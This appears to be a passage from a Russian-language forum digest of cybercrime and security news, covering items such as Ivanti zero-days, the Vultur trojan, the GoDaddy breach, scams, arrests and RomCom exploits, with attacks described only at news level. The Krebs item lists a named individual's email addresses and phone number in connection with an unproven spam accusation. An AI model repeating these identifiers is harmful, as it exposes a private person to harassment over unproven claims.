вовлеченного в контрабанду «чувствительных технологий» в интересах российских
получателей и разведслужб, а также ряда лиц, по версии следствия ведущих
деятельность по передаче Китаю секретных и конфиденциальных сведений в сфере
высоких технологий.
Граждане РФ Олег Пацуля и Василий Беседин сознались в сговоре с целью обхода
экспортных ограничений, предусмотренных законодательством Соединенных Штатов.
Кроме того, Олег Пацуля также сознался в сговоре с целью транснационального отмывания денежных средств, говорится в официальном сообщении американского минюста.
По версии прокуратуры США, оба россиянина, проживавшие во Флориде, как минимум с мая 2022 года использовали, с вовлечением иных лиц, зарегистрированную в этом штате компанию MIC P&I LLC для поставок авиационных запчастей заказчикам из РФ – преимущественно коммерческим авиаперевозчикам – в нарушение законодательства США, регулирующего экспортные операции.
Как утверждается, Пацуля и Беседин получали заказы напрямую от российских авиакомпаний, включая те из них, в отношении которых уже были ужесточены экспортные правила из-за специальной операции на Украине. При этом для сокрытия конечных получателей авиационных запчастей и источников платежей россияне якобы задействовали фирмы-посредники и банковские счета в третьих странах.
Используя указанные выше методы, россияне, как утверждает прокуратура, обращались к поставщикам запасных частей, вводя их в заблуждение относительно национальной принадлежности конечных получателей. Так, указывает Министерство юстиции США, в сентябре 2022 года россияне совершили поездку в Аризону с целью приобретения у местной компании оборудования для тормозных систем самолетов, в частности, лайнера Boeing 737.
По информации прокуратуры, в общей сложности, на счета в американских банках, связанных с подконтрольной Олегу Пацуле компанией MIC P&I LLC, от российских авиаперевозчиков через турецкие банковские организации поступило около 4,6 миллиона долларов, которые должны были пойти на приобретение авиационных запчастей и комплектующих. В рамках признания вины Олег Пацуля согласился на конфискацию в числе прочих активов суммы, эквивалентной 4,6 миллионам долларов.
Как отмечал американский Минюст, задержание россиян в июне 2023 года стало результатом деятельности специального подразделения - «Ударной группы по прорывным технологиям» (Disruptive Technology Strike Group).
Оглашение приговора по этому делу запланировано на 17 июня.
Не успели разработчики Ivanti исправить уязвимости нулевого дня, обнаруженные в начале января в продуктах Connect Secure VPN и Policy Secure, как стало известно о двух новых 0-day багах, так же затрагивающих Connect Secure, Policy Secure и шлюзы ZTA. Причем одна из уязвимостей уже находится под атаками.
Напомним, что в прошлом месяце стало известно о двух проблемах в Ivanti Connect Secure VPN и Policy Secure, которые подвергались массовым атакам. Уязвимости CVE-2023-46805 и CVE-2024-21887 позволяют обойти аутентификацию и внедрять произвольные команды.
На создание и [выпуск патчей](https://forums.ivanti.com/s/article/KB- CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for- Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US) для этих для этих 0-day разработчикам понадобился почти целый месяц. Однако сразу после выхода этих исправлений в компании [предупредили](http://forums.ivanti.com/s/article/CVE-2024-21888-Privilege- Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US) о новой угрозе: двух новых 0-day проблемах.
Первая уязвимость нулевого дня (CVE-2024-21893) представляет собой проблему request forgery, проявляющуюся на стороне сервера в компоненте SAML. Уязвимость позволяет обходить аутентификацию и получать доступ к определенным ресурсам на уязвимых устройствах.
Вторая уязвимость (CVE-2024-21888) была обнаружена в веб-компоненте шлюзов и позволяет злоумышленникам повысить привилегии до уровня администратора.
«В рамках продолжающегося изучения уязвимостей в Ivanti Connect Secure, Ivanti Policy Secure и шлюзах ZTA, о которых было сообщено 10 января, мы выявили новые уязвимости. Эти проблемы затрагивают все поддерживаемые версии (9.x и 22.x), — говорится в сообщении компании. — На данный момент у нас нет данных о том, что CVE-2024-21888 затронула каких-либо клиентов. Пока нам известно лишь о небольшом количестве клиентов, подвергшихся атакам на CVE-2024-21893».
Click to expand...
При этом отмечается, что в компании ожидают «резкого увеличения масштабов атак, как только информация об уязвимостях станет общедоступной».
Ivanti уже выпустила патчи для ряда версий ZTA и Connect Secure, устранив обе проблемы, а также опубликовала [инструкции](https://forums.ivanti.com/s/article/KB- CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for- Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US) по защите от этих уязвимостей для тех устройств, которые пока только ожидают выхода исправлений. При этом в компании [призвали](https://forums.ivanti.com/s/article/KB- CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for- Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US) клиентов выполнить сбросить настройки уязвимых устройств до заводских перед установкой исправлений, чтобы помешать попыткам злоумышленников закрепиться в сети между обновлениями.
По информации специалистов Shadowserver, в настоящее время в сети можно найти [более 22 000](https://dashboard.shadowserver.org/statistics/iot-devices/time- series/?date_range=7&vendor=pulse+secure&model=pulse+connect+secure+vpn&group_by=geo&style=stacked) доступных экзепляров ICS VPN, свыше 7200 из которых находятся в США.
Кроме того, Shadowserver отслеживает скомпрометированные экземпляры Ivanti VPN
по всему миру. И только 31 января 2024 года было выявлено [более
390](https://dashboard.shadowserver.org/statistics/combined/time-
series/?date_range=other&d1=2024-01-16&d2=2024-01-18&source=compromised_website&tag=ivanti-
connect-secure%2B&group_by=geo&style=stacked) скомпрометированных устройств.

Уязвимые Ivanti VPN (Shodan)
В связи с «существенной угрозой» и значительным риском нарушения безопасности, специалисты Агентства по кибербезопасности и защите инфраструктуры США (CISA) обязали все федеральные ведомства «отключить все экземпляры Ivanti Connect Secure и Ivanti Policy Secure от сетей ведомств как можно скорее», но не позднее 23:59 2 февраля 2024 года.
После отключения устройств ведомствам следует следить за признаками компрометации своих систем, а также следить за службами аутентификации и управления идентификацией, подверженными рискам, изолировать корпоративные среды и провести аудит уровня доступа учетных записей.
Чтобы вернуть устройства Ivanti в строй, CISA рекомендует экспортировать конфигурацию, сбросить настройки на заводские, обновить устройства до исправленных версий ПО, заново импортировать резервные копии конфигураций и отозвать все сертификаты, ключи и пароли.
Более того, федеральные агентства, в сетях которых работали уязвимые продукты Ivanti, должны рассматривать все связанные доменные учетные записи как скомпрометированные, отключить подключенные/зарегистрированные устройства или выполнить двойной сброс пароля для всех аккаунтов, отозвать тикеты Kerberos и облачные токены.
В даркнете набирает обороты новый фишинговый сервис-как-услуга Darcula. Целью атак является кража данных пользователей Android и IPhone в более чем 100 странах. В активе у злоумышленников 20 тысяч доменов для имитации популярных брендов и больше 200 шаблонов под фейковые страницы.
Что примечательно, операторы отошли от привычной рассылки фишинговых сообщений через SMS. Вместо этого они используют RCS-протоколы для Google Messages и iMessage. Что, в свою очередь, повышает убедительность рассылки и её устойчивость к блокировкам. В ход также идут фермы из устройств для обхода ограничений на массовую рассылку и социнженерия, чтобы побудить юзера ответить на сообщение и разблокировать ссылку в iMessage. Судя по жалобам на /r/phishing, ~~Dankula~~ Darcula уже успел засветиться в нескольких крупных кампаниях. Подробнее о сервисе в [отчёте](https://www.netcraft.com/blog/darcula-smishing-attacks-target-usps- and-global-postal-services/).
Полиция Манчестера расследует дело о банковском мошенничестве, к которому могут быть причастны пожилые британцы. По сведениям журналистов Manchester Evening News, в группировку входили 81-летний мужчина и 76-летняя женщина. Их сообщником был более молодой человек, которому «лишь» 46 лет.
Пока ведется следствие, серьезные детали в прессу не просочились. Известно лишь, что на банковском счете пожилого мужчины была обнаружена «подозрительная деятельность». Представители банка решили, что он сам стал жертвой мошенников, однако у полиции, судя по всему, другая версия.
Косвенно на существующие против пенсионеров доказательства намекает тот факт, что они были отпущены британскими силовиками лишь под солидный залог. Расследование продолжается.
source: manchestereveningnews.co.uk/news/greater-manchester-news/two- pensioners-arrested-fraud-after-27837585
Организованную преступления группу разоблачили сотрудники Департамента киберполиции совместно со следственным управлением полиции Киевской области, СБУ, работниками служб безопасности Приватбанка, Монобанка, Сенсбанка и при процессуальном руководстве областной прокуратуры.
Установлено, что трое человек получали данные о мобильных номерах военнослужащих, с которыми потеряли связь родные или тех, кто сейчас находится в плену. Злоумышленники осуществляли перевыпуск SIM-карт и проверяли, являются ли перевыпущенные номера финансовыми. Далее получали доступ к онлайн-банкингу. Со счетов защитников перечисляли остаток денег, а также выпускали кредитные карты и присваивали суммы займа.
По предварительным данным, группировке удалось получить доступ к мобильным номерам более 20 военнослужащих, которые находятся в плену или пропали без вести. Общая сумма ущерба составляет более 2 миллионов гривен.
Во время обыска в домах фигурантов правоохранители изъяли банковские карты, SIM-карты, мобильные телефоны, которые использовались в противоправной деятельности. Также полицейские обнаружили гранаты, которые направили на экспертизу.
Организатор преступной группы задержан в порядке статьи 208 Уголовного процессуального кодекса Украины.
Мужчине сообщено о подозрении по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. После проведения мероприятий будет предоставлена правовая квалификация действий всех фигурантов.
Появился новый вирус для Android-смартфонов Vultur, который записывает и передает злоумышленникам изображение с экрана и информацию о нажатиях. Это позволяет практически в реальном времени красть любую конфиденциальную информацию с устройства, включая логины и пароли от банковских приложений и криптокошельков. Эксперты пока не зарегистрировали распространения Vultur в России, но не исключают этого в будущем. Также специалисты отмечают, что этот вирус — предвестник эволюции мобильных троянцев, которые в будущем могут стать более автоматизированными.
Голландские специалисты по информационной безопасности из компании ThreatFabric обнаружили новый вирус для Android-смартфонов — Vulture. По данным фирмы, он делает скриншоты экрана устройств, фиксирует данные о нажатиях и передает эту информацию злоумышленникам. С помощью Vulture операторы вредоносной программы могут красть практически любую конфиденциальную информацию со смартфона жертвы. Целевые данные — логины и пароли от банковских приложений и криптокошельков. Ценность жертвы оператор определяет, изучая список установленных приложений на устройстве, который вирус также считывает и пересылает.
Для работы Vulture необходимо пользовательское разрешение на удаленный доступ к смартфону. Оно запрашивается при первом запуске приложения-носителя. Собственно, перманентная активность режима удаленного доступа, которая визуально отмечается в меню быстрых настроек, может натолкнуть пользователя на мысль о заражении смартфона. Но даже в случае обнаружения зловреда человеку не удастся просто избавиться от вируса, потому что он автоматически нажимает кнопку «назад» всякий раз, когда система просит подтвердить удаление приложения-носителя.
Директор технического департамента RTM Group Федор Музалевский считает, что для быстрого и гарантированного избавления от Vulture пользователю придется сбросить настройки смартфона до заводских установок.
Вирус распространяется через приложения в Google Play. Сейчас специалисты ThreatFabric обнаружили по меньшей мере два приложения-носителя, которые заразили от 5 тыс. до 8 тыс. пользователей. По словам исследователя мобильных угроз «Лаборатории Касперского» Виктора Чебышева, Vultur — хоть и не самый технологичный троянец, но весьма опасен, поскольку распространяется через Google Play.
— Подобная схема распространения считается чрезвычайно эффективной, поскольку у площадки очень большая пользовательская база и доверие людей к Google Play максимально. Потенциальные жертвы, даже не раздумывая, устанавливают приложения из этого источника, доверяя свою безопасность Google, — говорит он.
Золотая жила
Специалисты ThreatFabric отметили, что подавляющее большинство обнаруженных ими конфигураций зловредной программы нацелены на приложения банков Италии, Австралии, Испании, Нидерладнов и Великобритании. Однако российские эксперты говорят, что потенциальную угрозу Vultur представляет и для пользователей в нашей стране.
В «Лаборатории Касперского» сказали, что знают об этом вирусе с ноября 2020 года, но до сих пор не зарегистрировали ни одного случая заражения в РФ. Но прецеденты не исключены в будущем, хорошо развитый в стране мобильный банкинг может обратить внимание операторов Vultur на Россию, сказал Виктор Чебышев.
Похожего мнения придерживается и руководитель направления аналитики угроз ESET Александр Пирожков. По его данным, случаев заражения Vulture в России тоже не было, но злоумышленникам ничего не мешает переписать вирус под отечественные приложения.
— Потенциал Vultur позволяет адаптировать его под новые потребности злоумышленников. Если учесть, что Россия — один из лидеров по числу держателей криптокошельков, то наша страна может стать лакомой целью для операторов нового вируса, — говорит он.
В июле 2021 года аналитическое агентство Chainalysis опубликовало рейтинг стран по доходу от реализации биткоинов. В нем Россия заняла пятое место с показателем в $600 млн.
Впрочем, некоторые эксперты считают, что до тех пор, пока вирус дойдет до нашей страны, он уже перестанет быть актуальным.
— В перспективе заражение смартфонов отечественных пользователей возможно, но маловероятно. Скорее всего, разработчики исправят уязвимость раньше, чем она докатится до России, — считает Федор Музалевский.
По его словам, сейчас важно следить за обновлениями банковских приложений и не откладывать их установку.
Штамм из будущего
По мнению специалистов ThreatFabric, появление Vultur в очередной раз подтверждает тенденцию по переходу разработчиков банковских троянцев от классической методики с фишинговыми окнами к более технологичным.
— Метод кражи паролей к криптокошелькам через запись экрана является эффективным. Злоумышленники очень быстро получают доступ к похищенным данным. В результате пользователь даже не успевает понять, что стал жертвой трояна, — соглашается Александр Пирожков.
Как объяснил Виктор Чебышев, под классической методикой подразумевается подлог окон с интерфейсом банковских приложений. Обычно, после проникновения на смартфон, троянец ждет, когда жертва запустит банковское приложение. В момент, когда это происходит, вирус вклинивается в событие и показывает пользователю фальшивое окно с интерфейсом банковского сервиса. Пользователь вводит данные, и они тут же уходят злоумышленнику. После хакеры сами авторизуются в приложении и переводят деньги, подтверждая операции с помощью SMS-кодов, которые троянец также перехватывает.
— Чтобы успешно провести атаку по такой схеме, злоумышленникам нужно показать жертве качественно созданное фальшивое окно банка. И если они хотят, чтобы троянец одинаково эффективно атаковал большую выборку банков, им придется рисовать такие окна под каждый случай, что весьма трудозатратно. Подобная техника превалирует среди мобильных финансовых угроз, — говорит Виктор Чебышев.
По его мнению, следующее поколение вирусов — не предоставляющие удаленный доступ, а те, что после проникновения на смартфон самостоятельно взаимодействуют с банковскими приложениями и осуществляют переводы. По словам Виктора Чебышева, такие программы уже появляются. Они требуют больших ресурсов при разработке, поскольку киберпреступникам приходится разбираться, как работает каждое банковское приложение, но автоматизация оправдывает эти вложения.
• Source: https://www.threatfabric.com/blogs/vultur-v-for-vnc.html
The expose included live details such as location, whether the microphone was active, and the name of the WiFi network that the camera is connected to, along with information about the webcam owner such as email addresses.
Раскрыты сведения о взломе GoDaddy, одного из крупнейших регистраторов доменов и хостинг-провайдеров. 17 ноября были выявлены следы неавторизированного доступа к серверам, отвечавшим за предоставление хостинга на базе платформы WordPress (сопровождаемые провайдером готовые WordPress-окружения). Разбор инцидента показал, что посторонние получили доступ к системе управления WordPress- хостингом через скомпрометированный пароль одного из сотрудников, и использовали неисправленную уязвимость в устаревшей системе для получения доступа к конфиденциальной информации об 1.2 млн активных и не активных пользователей WordPress-хостинга.
В руки атакующих попали данные об именах учётных записей и паролях, используемых клиентами в СУБД и SFTP; паролях администратора каждого экземпляра WordPress, выставленных при начальном создании хостинг-окружения; закрытых SSL-ключах части активных пользователей; email-адресах и номерах клиентов, которые могли использоваться для совершения фишинга. Отмечается, что атакующие имели доступ к инфраструктуре начиная с 6 сентября.
Разработчики Luna Yield использовали популярность блокчейна Solana для скама, разработав смарт-контракт с багом в коде. DeFi-проект предполагал доходное фермерство в новой экосистеме на инвестиции в активах WETH, WBTC и USDT.
Злоумышленники распродали служебные токены LUNY через площадку SolPAD Finance, которая пытается стать центральным хабом для IDO-размещений на блокчейне Solana.
Завершив двухдневных сбор средств, они опустошили всю ликвидность Luna Yield, прокручивая криптовалюту через миксер Tornado Cash, чтобы запутать следы перемещения похищенных активов. Убытки от скама оцениваются в $8 млн, но ущерб репутации SolPAD Finance гораздо больше.
IDO-площадке решила взять на себя компенсацию 60% пропавших финансов, инвесторы уже начали получать средства на свои кошельки. Скам Luna Yield стал первым случаем кражи инвестиций, связанный с блокчейном Solana.
Криптовалюта SOL попала в рейтинг топ-10 сайта CoinMarketCap на прошлой неделе. Разработчики блокчейна Solana решили простимулировать развитие DeFi- отрасли в своей экосистеме, запустив аирдроп на $180 млн.
Эти средства будут розданы в виде дополнительного урожая по пулам ликвидности, открытыми на блокчейне. Очевидно, инвесторы Luna Yield рассчитывали на подобный доход.
Сотрудники Управления экономической безопасности и противодействия коррупции ГУ МВД России по Московской области задержали четырёх участников группы, подозреваемых в хищении более шести миллионов рублей с банковских счетов.
Жительнице Подмосковья позвонил неизвестный мужчина, представился сотрудником службы безопасности одного из банков и сообщил о том, что с её карты якобы пытаются списать денежные средства. Для приостановления несанкционированной транзакции ей необходимо снять деньги со всех банковских карт и перевести на указанный им счет для помещения в страховую ячейку. Доверившись звонившему, женщина выполнила его требования и перевела более полутора миллиона рублей. На следующий день потерпевшей снова позвонил мошенник и сказал, что на нее оформлен кредит в размере пяти миллионов рублей, средства уже поступили на ее пластиковую карту и могут быть также похищены злоумышленниками. Для сохранения денег ей необходимо срочно их перевести аналогичным способом. Согласившись с собеседником, женщина перечислила более четырех с половиной миллионов рублей через банковские терминалы на указанные аферистом счета.
Следователем следственного отдела УМВД России по г.о. Химки возбуждено уголовное дело по признакам преступления, предусмотренного ч. 4 ст. 159 УК РФ «Мошенничество».
В результате проведения оперативно-розыскных мероприятий полицейскими задержаны 36-летний уроженец Курганской области и 37-летний уроженец одного из государств Ближнего Востока, подозреваемые в совершении противоправной деятельности. При обыске квартиры, арендуемой задержанными в г.о. Одинцово, обнаружены 24 банковские карты, оформленные на других лиц, 14 мобильных телефонов, 18 сим-карт, ноутбук, черновые записи с личными данными граждан, их телефонами и номерами банковских карт, а также заготовки текстов с «легендами», используемыми мошенниками при ведении разговоров с потенциальными жертвами.
В ходе дальнейшего расследования уголовное дело было передано в ГСУ ГУ МВД России по Московской области. При проведении следственных действий и оперативно-розыскных мероприятий установлены еще двое активных членов группы – 27-летний житель Москвы и 32-летний житель Новосибирска. Полицейские при поддержке Росгвардии задержали их по месту жительства одного из правонарушителей и доставили в Московскую область.
Расследование продолжается, устанавливается причастность злоумышленников к совершению аналогичных преступлений, а также роль каждого участника группы и причастность иных лиц к совершению мошенничества.
В Бресте 25-летнему местному жителю суд назначил наказание в виде штрафа в размере Br5,8 тыс. за несанкционированный доступ к компьютерной информации и использование вредоносных программ, сообщили БЕЛТА в службе информации областной прокуратуры.
С октября 2017 по июнь 2020 года молодой человек использовал компьютерные программы с автоматическим подбором логинов и паролей к учетным записям интернет-ресурсов. У него была возможность для автоматической авторизации и получения сведений об учетных записях без уведомления об этом их владельцев, а также копирования информации. Полученные данные он продавал, незаконно получив Br5225. Эту сумму брестчанин добровольно уплатил в доход государства.
С учетом представленных гособвинителем доказательств суд признал молодого человека виновным по ч.1 ст.354 и ч.2 ст.349 УК. Ему в качестве наказания назначен штраф в размере 200 базовых величин, что составляет Br5,8 тыс.
Приговор вступил в законную силу.
В результате совместной операции Interpol и Afripol, проведенной в 25 африканских странах в течение четырех месяцев, было арестовано 14 подозреваемых и выявлено более 20 000 подозрительных сетей, связанных с убытками более чем на $40 миллионов.
Операция направлена на пресечение кибервымогательства, фишинга, мошенничества с корпоративными электронными письмами и других онлайн-афер, которые недавно набрали обороты в регионе. Официально оценивается, что арестованные лица и нейтрализованные сети обусловили убытки на сумму примерно $40 миллионов.
В Камеруне, например, были арестованы три подозреваемых киберпреступника в связи с мошеннической продажей произведений искусства на сумму $850 000. Кроме того, камерунские власти заблокировали два сайта в даркнет.
Полиция основывалась на информации от своих частных партнеров, таких как известные компании Group-IB и Trend Micro, которые поделились отчетами с правоохранительными органами. В них содержалась информация о:
3 786 злонамеренных серверах управления;
14 134 IP-адресах жертв, связанных с кражей данных;
1 415 фишинговых ссылках и доменах;
939 мошеннических IP;
Более 400 других вредоносных URL, IP и ботнетах.
Первая операция Africa Cyber Surge, проведенная в период с июля по ноябрь 2022 года, включала 10 арестов, связанных с различными мошенничествами и предполагаемым мошенничеством на сумму около 800 000 долларов, закрытие эритрейского рынка даркнета, торгующего хакерскими инструментами, и «действия, предпринятые против более 200 000 части вредоносной инфраструктуры, которые способствовали киберпреступности в Африке»
Данная операция стала важным шагом в борьбе с киберпреступностью в Африке, и её успешное проведение подчеркнуло значимость международного сотрудничества в этой области.
source: group-ib.com/media-center/press-releases/africa-cyber-surge- operation/?utm_source=press_release&utm_campaign=africa-cyber-surge- ii&utm_medium=organic
Независимый американский журналист Брайан Кребс (Brian Krebs) предпринял попытку деанонимизации лидера группы разработчиков спам-ботнета , с помощью которого криптомошенники заманивают на свои ресурсы пользователей социальной сети Mastodon. Полученными результатами, а также деталями беседы с российским хакером , он поделился в отдельном материале.
Программист-фрилансер, работающий над модернизацией и масштабированием инфраструктуры проекта Mastodon Рено Шапю (Renaud Chaput) рассказал Кребсу о том, что 4 мая 2023 года кто-то запустил поток спама , нацеленный на пользователей криптосообществ через опцию приватных упоминаний. В сообщениях говорилось, что жертвы спама получили инвестиционный кредит на платформе для торговли криптовалютой под названием moonxtrade.com. При этом Шапю утверждает, что для регистрации новых учетных записей спамеры использовали более 1,5 тысячи адресов у 400 различных провайдеров. Они подписывались на криптоинвесторов и применяли перекрестное упоминание другие спам-аккаунтов.
Суммарно за три недели были прорекламированы около сотни доменов, посвященных инвестициям в крипту. На это наслоилась активность в относительно непопулярной соцсети Mastodon ботов, что начало вызывать перегруз серверов , ответственных за регистрации. По словам Шапю, вместо трех регистраций в минуту площадка столкнулась с 900. Вскоре после этого началась точечная DDoS-атака на mastodon.social и mastondon.online, в ходе которой на протяжении трех часов эти домены получали 200-400 тысяч запросов ежесекундно.
Что любопытно, многие из свежих спам-аккаунтов были зарегистрированы с помощью
протокола авторизации 0auth , а общим для этих учеток был домен
quot.pw.
Кребс выяснил, что последним владельцем этого домена был житель Краснодара с адресом электронной почты edgard011012@gmail.com. Он связан с учетными записями на нескольких российских даркнет-форумах, например с пользователем с ником edman, который продавал логи взломанных устройств и доступы к устройствам интернета вещей (IoT). Кроме того, в сентябре 2018 года некто зарегистрировал с использованием адреса edgard0111012@gmail.com аккаунт цыпа на Lolzteam. В мае 2020 года он сказал в беседе с другим участником проекта, что quot.pw является его доменом.
«Я дешево делаю ботов для Telegram и прочий мусор», — говорится в одной из веток продаж от цыпы за февраль 2020 года. При этом с ним можно было установить контакт в Telegram с помощью ссылки в его профиле с пользователем Quotpw. Так Кребс начал диалог со спамером.
На вопрос, знал ли он, что его домен используется для управления ботнетом, который забрасывал Mastodon спамом с криптомошенничеством, Quotpw заявил, что спам был создан его программным обеспечением.
«Это было сделано для ограниченного круга людей», — сказал Quotpw, отметив, что недавно он выпустил программное обеспечение для ботов с открытым исходным кодом на GitHub.
Далее Quotpw сообщил, что спам-ботнет на самом деле куда массивнее , чем
те несколько сотен IP-адресов, которые отслеживает Шапю, добавив, что речь
идет преимущественно о резидентных прокси. Собеседник Кребса отметил, что
за последние несколько недель он заработал более двух тысяч долларов ,
отправив около ста тысяч приватных упоминаний пользователям различных
сообществ Mastodon. При этом Quotpw упомянул, что в его родном городе «за
такую работу платят больше , чем за "белую" работу», и предложил Кребсу
подумать о величине зарплат в России.
Однако этой беседой журналист не ограничился, выяснив, что edgard011012@gmail.com сменил регистрационные данные для quot.pw. Почту [msr-sergey2015@yandex.ru](mailto:msr- sergey2015@yandex.ru) дополнил австрийский телефон +436607003748.
Компания Constella Intelligence , отслеживающая утечки данных, обнаружила, что адрес msr-sergey2015@yandex.ru был связан с аккаунтами на сайтах мобильных приложений aptoide.com (пользователь CoolappsforAndroid) и vimeworld.ru , которые были созданы с разных интернет-адресов в Вене (Австрия). Поиск в Skype по этому австрийскому номеру телефона вывел Кребса на Сергея Прошутинского , который указал в качестве своего местоположения Вену. В профиле человека с таким же именем на LinkedIn указано, что в 2024 году он окончит TGM — христианскую миссионерскую школу в Австрии. В его резюме также говорится, что он — стажер по обработке данных в Mondi Group , австрийском производителе экологичной упаковки и бумаги.
Сергей Прошутинский не ответил на запросы Кребса о комментариях. При этом Quotpw в беседе начал отрицать , что он и является Прошутинским. Он заявил, что тот был его другом , а домен зарегистрировал в качестве подарка на день рождения в прошлом году.
«Он даже не специалист по информационной безопасности, — сказал Quotpw о Прошутинском. — Мои друзья не принадлежат к этой области. Никто из моих друзей не занимается мошенничеством или другой незаконной деятельностью».
Таким образом, пусть Кребс и не доказал , кто точно скрывается за спам- атаками на криптоинвесторов, он на минимальное расстояние приблизился к разгадке.
source: krebsonsecurity[.]com/2023/05/interview-with-a-crypto-scam-investment- spammer
В Германии арестован 24-летний житель Шлезвиг-Гольштейна, предположительно сотрудничавший с Killnet. Она обвиняется властями стран Евросоюза и США в атаках на компьютерные системы стран – союзниц Украины.
Killnet вели деятельность, направленную против стран НАТО, воруя данные и нанося вред интернет-ресурсам, следует из сообщения. В частности, за прошедшие два года хакеры осуществили ряд атак на серверы, в результате которых происходила их перегрузка. Роль 24-летнего задержанного состояла в подготовке инфраструктуры для подобных взломов.
Следователи полагают, что мужчина рекламировал в различных мессенджерах сервисы, через которые впоследствии и происходили хакерские атаки. При этом он сознательно предлагал свои услуги внутри группировки KillNET и, таким образом, помог хакерам осуществить по всей Германии [взломы компьютерных сетей](https://www.dw.com/ru/kontrrazvedka-frg-predupredila-ob-ugroze- rossijskih-kiberatak/a-70167770) в сферах безопасности, инфраструктуры и финансов, говорится в сообщении.
12 декабря следователи провели обыск жилища подозреваемого в федеральной земле Шлезвиг-Гольштейн и конфисковали ряд носителей данных. На их основе расследование будет продолжено. 11 декабря Федеральное ведомство криминальной полиции сообщило о трех задержаниях в Германии и Франции в связи с делом группировки KillNET.
Президент Федерального уголовного ведомства земли Гессен Андреас Рериг заявил, что большинство сообщников Killnet находятся в России, что затрудняет проведение оперативных мероприятий. В то же самое время он выразил удовлетворение тем, что благодаря интенсивным усилиям следователей удалось выявить и задержать одного из ее членов в Германии.
Source: <https://www.dw.com/ru/v-frg-zaderzali-podozrevaemogo-v-svazi-s- hakerami-iz-rossii/a-71047204>
Исследователи безопасности обнаружили две ранее неизвестные уязвимости нулевого дня, которые активно эксплуатируются RomCom, связанной с Россией хакерской группой, для атак на пользователей браузера Firefox и владельцев устройств Windows по всей Европе и Северной Америке.
RomCom - это киберпреступная группа, которая известна тем, что осуществляет кибератаки и другие цифровые вторжения в интересах российского правительства. Группа, которая в прошлом месяце была связана с атакой с использованием выкупа, направленной на японского технологического гиганта Casio, также известна своей агрессивной позицией в отношении организаций, союзных с Украиной, в которую Россия вторглась в 2014 году.
Исследователи из компании ESET утверждают, что нашли доказательства того, что RomCom использовал две ошибки «0 day», названные так потому, что производители программного обеспечения не успели выпустить исправления до того, как они были использованы для взлома, для создания эксплойта «zero click», который позволяет хакерам удаленно устанавливать вредоносное ПО на компьютер цели без какого-либо взаимодействия с пользователем.
«Такой уровень сложности демонстрирует способность и намерение угрожающего субъекта разрабатывать скрытные методы атак», - [заявили исследователи ESET Дэмиен Шеффер и Ромен Дюмон в блоге в понедельник](https://www.welivesecurity.com/en/eset-research/romcom-exploits- firefox-and-windows-zero-days-in-the-wild/).
Цели RomCom должны были посетить вредоносный веб-сайт, контролируемый хакерской группой, чтобы запустить эксплойт с нулевым кликом. После использования одноименный бэкдор RomCom устанавливался на компьютер жертвы, предоставляя широкий доступ к ее устройству.
Шеффер сообщил TechCrunch, что число потенциальных жертв «широкомасштабной» хакерской кампании RomCom варьировалось от одной жертвы на страну до 250 человек, причем большинство жертв находилось в Европе и Северной Америке.
Mozilla исправила уязвимость в Firefox 9 октября, через день после того, как ESET предупредила производителя браузера. Проект Tor Project, разрабатывающий браузер Tor на основе кодовой базы Firefox, также исправил уязвимость; однако Шеффер сообщил TechCrunch, что ESET не видела никаких доказательств того, что браузер Tor использовался в ходе этой хакерской кампании.
Microsoft исправила уязвимость, затрагивающую Windows, 12 ноября. Исследователи безопасности из группы анализа угроз Google, которая занимается расследованием кибератак и угроз, поддерживаемых правительством, сообщили об ошибке в Microsoft, предположив, что эксплойт мог быть использован в других хакерских кампаниях, поддерживаемых правительством.
source: [https://techcrunch.com/2024/11/26/r...zero-day-bugs-in-widespread- hacking-campaign/](https://techcrunch.com/2024/11/26/russia-linked-hackers- exploited-firefox-and-windows-zero-day-bugs-in-widespread-hacking-campaign/)
CISA предупреждает, что уязвимость почтового сервера Roundcube, исправленная в
сентябре, в настоящее время активно используется для атак с использованием
межсайтовых сценариев (XSS).
Уязвимость безопасности (CVE-2023-43770) - это постоянная ошибка межсайтового
скриптинга (XSS), которая позволяет злоумышленникам получать доступ к
ограниченной информации через обычные текстовые сообщения, злонамеренно
созданные ссылки при атаках низкой сложности, требующих взаимодействия с
пользователем.
Уязвимость затрагивает почтовые серверы Roundcube, работающие под управлением
версий новее 1.4.14, 1.5.x до 1.5.4 и 1.6.x до 1.6.3.
"Мы настоятельно рекомендуем обновить все производительные установки Roundcube
1.6.x этой новой версией", - заявила команда безопасности Roundcube, выпустив
обновления для системы безопасности CVE-2023-43770 пять месяцев назад. Хотя
компания не предоставила никаких подробностей об атаках, CISA добавила
уязвимость в свой каталог известных эксплуатируемых уязвимостей, предупредив,
что такие недостатки безопасности являются "частыми векторами атак для
злоумышленников в киберпространстве и представляют значительные риски для
федерального предприятия".
CISA также приказала агентствам Федеральной гражданской исполнительной власти
США (FCEB) защитить почтовые серверы Roundcube от этой ошибки безопасности в
течение трех недель, к 4 марта, в соответствии с обязательной оперативной
директивой (BOD 22-01), выпущенной в ноябре 2021 года. В настоящее время
Shodan отслеживает более 132 000 серверов Roundcube, доступных в Интернете.
Однако нет информации о том, сколько из них уязвимы для продолжающихся атак с
использованием эксплойтов CVE-2023-43770.
Другой недостаток Roundcube, уязвимость хранимого межсайтового скриптинга
(XSS), отслеживаемая как CVE-2023-5631, была нацелена российской хакерской
группой Winter Vivern (она же TA473) как минимум с 11 октября.
Злоумышленники использовали HTML-сообщения электронной почты, содержащие
тщательно обработанные вредоносные SVG-документы, предназначенные для
удаленного внедрения произвольного кода JavaScript.
Полезная нагрузка JavaScript, сброшенная в ходе октябрьских атак, позволила
российским хакерам украсть электронные письма со взломанных почтовых серверов
Roundcube, принадлежащих государственным структурам и аналитическим центрам в
Европе.
Операторы Winter Vivern также воспользовались уязвимостью CVE-2020-35730
Roundcube XSS в период с августа по сентябрь 2023 года.
Тот же баг был использован российской группой кибершпионажа APT28, входящей в
состав Главного разведывательного управления Генерального штаба России (ГРУ),
для взлома почтовых серверов Roundcube, принадлежащих украинскому
правительству.Хакеры Winter Vivern также воспользовались уязвимостью Zimbra
CVE-2022-27926 XSS в начале 2023 года, чтобы нацелиться на страны НАТО и
